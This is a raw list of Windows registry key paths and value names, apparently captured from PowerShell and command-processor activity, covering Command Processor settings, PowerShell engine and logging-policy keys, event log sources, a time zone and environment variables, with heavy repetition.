HKEY_CURRENT_USER
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
DisableUNCCheck
EnableExtensions
DelayedExpansion
DefaultColor
CompletionChar
PathCompletionChar
AutoRun
WinRegistryKey
SOFTWARE\Microsoft\.NETFramework\AppContext
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
ServiceStackVersion
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\Transcription
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\Transcription
HKEY_CURRENT_USER
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration
HKEY_CURRENT_USER
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ConsoleSessionConfiguration
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time\Dynamic DST
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\Windows\CurrentVersion\Winevt\Publishers\{816ebd75-f7ab-59c0-e2f0-bddfeed66ac2}
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
HKEY_CURRENT_USER
WinRegistryKey
Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
DisableUNCCheck
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\W. Europe Standard Time
HKEY_LOCAL_MACHINE
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
TZI
MUI_Display
MUI_Display
MUI_Std
MUI_Std
MUI_Dlt
MUI_Dlt
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
WinRegistryKey
Software\Microsoft\PowerShell\3\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
__PSLockdownPolicy
